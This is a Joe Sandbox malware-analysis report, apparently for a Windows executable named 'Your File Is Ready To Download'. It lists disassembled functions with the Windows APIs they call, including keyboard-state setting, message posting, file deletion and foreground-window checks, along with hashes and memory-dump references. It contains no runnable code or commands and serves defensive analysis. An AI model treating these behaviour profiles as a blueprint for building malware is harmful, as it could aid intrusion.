Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Initializemalloc
String ID: No tray mem$Tray
API String ID: 88790506-3325046031
Opcode ID: d623b4ffe890f9daef19006813c742b567f3ddde7394d1dc4923c8e769e721de
Instruction ID: e5c9d927c7f28865d76628b3a3a17fca7ea3edadf40f9819692fffc56e8c860a
Opcode Fuzzy Hash: d623b4ffe890f9daef19006813c742b567f3ddde7394d1dc4923c8e769e721de
Instruction Fuzzy Hash: DF717931115B5085FB0B8F96BC813C577A9B76DB90FA88229DF988B7B0DB78C462C354

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140049780, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00000001400673E0: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000001400483D2), ref: 0000000140067413
Part of subcall function 00000001400673E0: IsWindowVisible.USER32 ref: 0000000140067434

GetWindowRect.USER32 ref: 00000001400497BF
MoveWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001400361D0), ref: 00000001400498A3

Part of subcall function 00000001400C8EEC: _errno.LIBCMT ref: 00000001400C8F04
Part of subcall function 00000001400C8EEC: _invalid_parameter_noinfo.LIBCMT ref: 00000001400C8F0F

Strings

default, xrefs: 00000001400497E2, 0000000140049814, 0000000140049841, 000000014004986B

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$ForegroundMoveRectVisible_errno_invalid_parameter_noinfo
String ID: default
API String ID: 3007188186-3814588639
Opcode ID: 8b502d7487ee17e2c685ed1ef760bf9796494804628a9d6ca811dd9cef6c5e66
Instruction ID: fcf47a9b2b5d2d7b536f1583ee6bd04e2208299d92ace3e60e17a6308ce8fb36
Opcode Fuzzy Hash: 8b502d7487ee17e2c685ed1ef760bf9796494804628a9d6ca811dd9cef6c5e66
Instruction Fuzzy Hash: 5841583261474086F766EB2BA4407DA63A0E78DBD0F494035BF4A477AADF78D841C744

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140049325, Relevance: 4.6, APIs: 3, Instructions: 85COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNEL32 ref: 0000000140049336
GetTickCount.KERNEL32 ref: 0000000140049353
CloseHandle.KERNEL32 ref: 000000014004941E

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: CloseCodeCountExitHandleProcessTick
String ID:
API String ID: 1079426074-0
Opcode ID: e1a3ed10aebd5cd46d0dc07aa2357efcb6d6e6b4a315d7c40cc8f219a31e5042
Instruction ID: 3d760d75c5c17a42528695c4e5d9396f2cf2e871a0a131eb193270f97ee5edbd
Opcode Fuzzy Hash: e1a3ed10aebd5cd46d0dc07aa2357efcb6d6e6b4a315d7c40cc8f219a31e5042
Instruction Fuzzy Hash: 2441CE72608B808AF756DF66E4543E927B5FB4DBD9F014126EF89477A9CB38C481C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140016EF4, Relevance: 4.6, APIs: 3, Instructions: 54windowCOMMON

Download Yara Rule

APIs

SetKeyboardState.USER32 ref: 0000000140016F45
PostMessageW.USER32 ref: 0000000140016F6D
PostMessageW.USER32 ref: 0000000140016FB4

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: MessagePost$KeyboardState
String ID:
API String ID: 857446259-0
Opcode ID: 15adc71311cb775ed1fbadb6486e568230673f2749ed359a1d5977291c2225ca
Instruction ID: f03c75429dfa0944f8ad8109e2f28eafe3e8b08e1308e0373cc97ea37175457c
Opcode Fuzzy Hash: 15adc71311cb775ed1fbadb6486e568230673f2749ed359a1d5977291c2225ca
Instruction Fuzzy Hash: A621C0322186C085F3339322B8147EE6761B39D7E8F000165FF990BAF9CB3A9946D310

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140016F0E, Relevance: 4.6, APIs: 3, Instructions: 54windowCOMMON

Download Yara Rule

APIs

SetKeyboardState.USER32 ref: 0000000140016F45
PostMessageW.USER32 ref: 0000000140016F6D
PostMessageW.USER32 ref: 0000000140016FB4

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: MessagePost$KeyboardState
String ID:
API String ID: 857446259-0
Opcode ID: da2789f02ea4cba1293bed030b38debb99721dbcc7098ce0545b1470c5c780ab
Instruction ID: 461201481fed29e5502ac01d4da28dbe45d60afcffaf98ee9660998e9079a725
Opcode Fuzzy Hash: da2789f02ea4cba1293bed030b38debb99721dbcc7098ce0545b1470c5c780ab
Instruction Fuzzy Hash: 6621C3362185C085F3338322B8147E96B60B39D7A8F000155FF950BAF9CB7AD946D310

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140065D90, Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 0000000140065DFA
DeleteFileW.KERNEL32 ref: 0000000140065E03
GetLastError.KERNEL32 ref: 0000000140065E0E

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: ErrorLast$DeleteFile
String ID:
API String ID: 2815225636-0
Opcode ID: 3f0ade653b1fd2698cda61273518b4eae990b4e527065918f7cb062061e5b0c6
Instruction ID: 41524e2766148cf25f444c6ae4e15a434695c839f0af058ba91b05577b8aed52
Opcode Fuzzy Hash: 3f0ade653b1fd2698cda61273518b4eae990b4e527065918f7cb062061e5b0c6
Instruction Fuzzy Hash: 0711907260469182EB2A9B12E9147F9B3A1EB9CBC5F644511EF49036F0EB3AC541C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140016F28, Relevance: 4.6, APIs: 3, Instructions: 53windowCOMMON

Download Yara Rule

APIs

SetKeyboardState.USER32 ref: 0000000140016F45
PostMessageW.USER32 ref: 0000000140016F6D
PostMessageW.USER32 ref: 0000000140016FB4

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: MessagePost$KeyboardState
String ID:
API String ID: 857446259-0
Opcode ID: 37fd42ac9b941435543d6114d4224f705f71e47cf3b72097ea70634599f2fb9f
Instruction ID: 33fcb8770caf4f4a675fb90860bc68d107b4a7765497fe05f7a5cd31398f2954
Opcode Fuzzy Hash: 37fd42ac9b941435543d6114d4224f705f71e47cf3b72097ea70634599f2fb9f
Instruction Fuzzy Hash: 2F21D2322186C085F3778322B8147EA7760B39D7E8F000155FF950BAF9CB3A9946D710

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D3A4C, Relevance: 4.5, APIs: 3, Instructions: 46memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001400D3A6F
RtlAllocateHeap.NTDLL(?,?,00000000,00000001400CF2E7,?,?,00000000,00000001400CD0F7,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B), ref: 00000001400D3AA3
_callnewh.LIBCMT ref: 00000001400D3ABA

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: AllocateHeap_callnewh_errno
String ID:
API String ID: 638267422-0
Opcode ID: 98618769027308b63622bb6cfbb8c4ab04824c1c9e9cb0d6adbd5341a5ddb42d
Instruction ID: 181cd911a9d43cc91bf5c907a7d3f0c3725a88b33cda1abcd1de8227cfc3250d
Opcode Fuzzy Hash: 98618769027308b63622bb6cfbb8c4ab04824c1c9e9cb0d6adbd5341a5ddb42d
Instruction Fuzzy Hash: 2611847130524086FF9B4B1BE6847EC63919F5CBE4F198621AB55076F4E77C88828322

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400CD2A0, Relevance: 4.5, APIs: 3, Instructions: 35memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00000001400C9248: _initp_misc_winsig.LIBCMT ref: 00000001400C9279
Part of subcall function 00000001400C9248: EncodePointer.KERNEL32 ref: 00000001400CDCEF

Part of subcall function 00000001400CDA48: InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,00000001400CD2B0,?,?,00000000,00000001400CC2FF), ref: 00000001400CDA8D

FlsAlloc.KERNEL32(?,?,00000000,00000001400CC2FF), ref: 00000001400CD2BB

Part of subcall function 00000001400CF2B4: Sleep.KERNEL32(?,?,00000000,00000001400CD0F7,?,?,00000000,00000001400CD153,?,?,?,00000001400C8D5B,?,?,00000000,00000001400CE60B), ref: 00000001400CF2F9

FlsSetValue.KERNEL32(?,?,00000000,00000001400CC2FF), ref: 00000001400CD2EC

Part of subcall function 00000001400CD00C: _lock.LIBCMT ref: 00000001400CD060
Part of subcall function 00000001400CD00C: _lock.LIBCMT ref: 00000001400CD07F

GetCurrentThreadId.KERNEL32 ref: 00000001400CD300

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _lock$AllocCountCriticalCurrentEncodeInitializePointerSectionSleepSpinThreadValue_initp_misc_winsig
String ID:
API String ID: 3311150041-0
Opcode ID: bf1268415874e4227b2dd1dd3cb46cc831adf265fbfa81def992912d0b46d8a7
Instruction ID: eb2150f201df1bae93c20475c35b2bb6ea994e67c686ad13f7b259438441eff6
Opcode Fuzzy Hash: bf1268415874e4227b2dd1dd3cb46cc831adf265fbfa81def992912d0b46d8a7
Instruction Fuzzy Hash: 5201123020874181FB5AAB7798453DC3295AF4D7E0F144729B626872F1EE38C4429321

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400A1E00, Relevance: 3.2, APIs: 2, Instructions: 188COMMON

Download Yara Rule

APIs

_wcstoi64.LIBCMT ref: 00000001400A1FB6
_wcstoi64.LIBCMT ref: 00000001400A2012

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _wcstoi64
String ID:
API String ID: 1512447906-0
Opcode ID: 044dffa3718fb0df74317192a1f86a910b8fc95589bb25715463b4d6a6fca667
Instruction ID: f99df26c046da111d735d2d823b9b5a28b3e61e6090f83efd9a9bc9495379a78
Opcode Fuzzy Hash: 044dffa3718fb0df74317192a1f86a910b8fc95589bb25715463b4d6a6fca667
Instruction Fuzzy Hash: 18717132301BC48ADB66CF2698447E923A5F798BD8F584225FB190BBA9DF34C991C740

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400A9570, Relevance: 3.1, APIs: 2, Instructions: 106COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00000000,000000014002057D), ref: 00000001400A95A6
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,00000000,000000014002057D), ref: 00000001400A965B

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-0
Opcode ID: 090751b588551e7fb12663856a2277cb7211cce2b324e714cee218f9d8558177
Instruction ID: 7d504ae26118fca3c94e3a7b4852b9a4c452f972b9310305d9b48ab701188fea
Opcode Fuzzy Hash: 090751b588551e7fb12663856a2277cb7211cce2b324e714cee218f9d8558177
Instruction Fuzzy Hash: 52418C72701B4085EB6A8F6AE45439D7BA1EBA9FD4F488219EB45073F8DB38C481CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400673E0, Relevance: 3.1, APIs: 2, Instructions: 61windowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000001400483D2), ref: 0000000140067413
IsWindowVisible.USER32 ref: 0000000140067434

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Window$ForegroundVisible
String ID:
API String ID: 4078700383-0
Opcode ID: 323e2c0b9b66a1b4b70ce7e71d3a47a8c39045dcd8e815535cc6bf05b00196d1
Instruction ID: 347f87b21ca5f235796bc58cea929a4e5286434b37936b4d1f717e5e82325f8d
Opcode Fuzzy Hash: 323e2c0b9b66a1b4b70ce7e71d3a47a8c39045dcd8e815535cc6bf05b00196d1
Instruction Fuzzy Hash: C421B031A04BC081FF626B57A8587E96BA2E79DBC4F644415EB4C076E1EFBCC4868301

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D5F74, Relevance: 3.1, APIs: 2, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00000001400D5F94
_invalid_parameter_noinfo.LIBCMT ref: 00000001400D5FA0

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: 5090c9f23ce9d11f09d96a89bb765753d8bddb85b80969df1d768e3d44018cbd
Instruction ID: 63cd7bd7490fbbb9e2e8db61560020efa3746afd32d2a7c02d4e7e39457ab6e7
Opcode Fuzzy Hash: 5090c9f23ce9d11f09d96a89bb765753d8bddb85b80969df1d768e3d44018cbd
Instruction Fuzzy Hash: 5521053231478286EB569B2AE5403AE3B90BB487D0F144231BF5A8B6F5DB38C411CB10

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400561E4, Relevance: 3.1, APIs: 2, Instructions: 51windowtimeCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32 ref: 0000000140056079
SendMessageTimeoutW.USER32 ref: 00000001400560F3
PostMessageW.USER32 ref: 0000000140056124
PostMessageW.USER32 ref: 0000000140056176
SendMessageTimeoutW.USER32 ref: 00000001400561AB
PostMessageW.USER32 ref: 000000014005623C

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: Message$Post$SendTimeout$ProcWindow
String ID:
API String ID: 2617672042-0
Opcode ID: cbbd2f1ed78fe0b643a4e3599133d563c1f7c60fc94972649405193cbb8c7ec3
Instruction ID: 835dc6e3d843a137295def1bc4f3a0e330071f37c9421674d1436fb837b6887a
Opcode Fuzzy Hash: cbbd2f1ed78fe0b643a4e3599133d563c1f7c60fc94972649405193cbb8c7ec3
Instruction Fuzzy Hash: AC117C35314A8089EBB6DB3794157EB17A1E74DBD4F281412AF4A577B2CA3BD842C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400D2824, Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,00000001400CC350), ref: 00000001400D2838
FreeEnvironmentStringsW.KERNEL32(?,?,?,00000001400CC350), ref: 00000001400D288B

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: bcad5650295df2f642541d7808201124abfcdd13beb5b36c2ed93cc047ae856d
Instruction ID: f0c717ee7f642112c1060bafb0eb856db9b713e8b4142c0a2dde65c1bb6b4680
Opcode Fuzzy Hash: bcad5650295df2f642541d7808201124abfcdd13beb5b36c2ed93cc047ae856d
Instruction Fuzzy Hash: 79016232B0678185FE66AF57A5553AD62A0EF6CFC0F4D4024FB4907BA5EE38C5839710

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400C9248, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

_initp_misc_winsig.LIBCMT ref: 00000001400C9279
EncodePointer.KERNEL32 ref: 00000001400CDCEF

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: EncodePointer_initp_misc_winsig
String ID:
API String ID: 2349294043-0
Opcode ID: 8437b7c824bda2776777e3ced0cb9816439660f20e892eba587c46d2e50f9e49
Instruction ID: 5561ba7336777a15b7314413e18d5b7e336282bb39ca0395ffc6e35def69d193
Opcode Fuzzy Hash: 8437b7c824bda2776777e3ced0cb9816439660f20e892eba587c46d2e50f9e49
Instruction Fuzzy Hash: 58E0E570A8934540E90EBB6368523EC32505B8EBC0F441035BB07073F2DD3CC1525301

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400CF234, Relevance: 2.5, APIs: 2, Instructions: 35sleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 00000001400CF25F

Part of subcall function 00000001400C8F74: _FF_MSGBANNER.LIBCMT ref: 00000001400C8FA4
Part of subcall function 00000001400C8F74: RtlAllocateHeap.NTDLL(?,?,00000000,00000001400CF264,?,?,00000000,00000001400CDBCD,?,?,?,00000001400CDC77,?,?,00000000,00000001400CD065), ref: 00000001400C8FC9
Part of subcall function 00000001400C8F74: _callnewh.LIBCMT ref: 00000001400C8FE2
Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FED
Part of subcall function 00000001400C8F74: _errno.LIBCMT ref: 00000001400C8FF8

Sleep.KERNEL32(?,?,00000000,00000001400CDBCD,?,?,?,00000001400CDC77,?,?,00000000,00000001400CD065,?,?,00000000,00000001400CD11C), ref: 00000001400CF272

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370031377.00000001400F0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370054438.000000014010F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.370071521.000000014011C000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370080103.0000000140124000.00000010.00020000.sdmp Download File
Associated: 00000001.00000002.370088203.0000000140127000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_140000000_Your File Is Ready To Download.jbxd

Similarity

API ID: _errno$AllocateHeapSleep_callnewhmalloc
String ID:
API String ID: 3606348469-0
Opcode ID: 292fcef106283a31abd679ea3e2e18ada82a1531665a2a9a74516240da803d42
Instruction ID: c44e37fb242dcf048b765f24048ce9215ec8f7e46ac2c1057e4b8cccb008804d
Opcode Fuzzy Hash: 292fcef106283a31abd679ea3e2e18ada82a1531665a2a9a74516240da803d42
Instruction Fuzzy Hash: 9501D132214B8486EA1A9F47A40039973A0F78CFD0F580114FF4A0B768EF34D982C784

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004918B, Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 00000001400B12D0: GetForegroundWindow.USER32(?,000000014000C660), ref: 00000001400B1324
Part of subcall function 00000001400B12D0: IsWindowVisible.USER32 ref: 00000001400B133E

GetTickCount.KERNEL32 ref: 0000000140049353

Memory Dump Source

Source File: 00000001.00000002.369900497.0000000140001000.00000020.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000001.00000002.369894933.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.370013915.00000001400DE000.00000002.00020000.sdmp Download File
